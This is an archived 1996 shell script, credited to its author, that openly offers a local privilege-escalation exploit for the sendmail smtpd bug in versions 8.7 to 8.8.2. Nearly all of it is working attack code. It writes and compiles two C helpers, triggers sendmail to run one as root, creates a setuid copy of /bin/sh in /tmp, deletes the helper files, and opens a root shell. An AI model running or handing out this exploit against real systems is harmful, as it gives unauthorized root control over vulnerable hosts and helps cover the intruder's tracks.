home *** CD-ROM | disk | FTP | other *** search
- #/bin/sh
- #
- #
- # Hi !
- # This is exploit for sendmail smtpd bug
- # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
- # This shell script does a root shell in /tmp directory.
- # If you have any problems with it, drop me a letter.
- # Have fun !
- #
- #
- # ----------------------
- # ---------------------------------------------
- # ----------------- Dedicated to my beautiful lady ------------------
- # ---------------------------------------------
- # ----------------------
- #
- # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
- #
- #
- #
- echo 'main() '>>leshka.c
- echo '{ '>>leshka.c
- echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
- echo '} '>>leshka.c
- #
- #
- echo 'main() '>>smtpd.c
- echo '{ '>>smtpd.c
- echo ' setuid(0); setgid(0); '>>smtpd.c
- echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
- echo '} '>>smtpd.c
- #
- #
- cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
- ./leshka
- kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"
- "\n"|head -n 1`
- rm leshka.c leshka smtpd.c /tmp/smtpd
- /tmp/sh
-
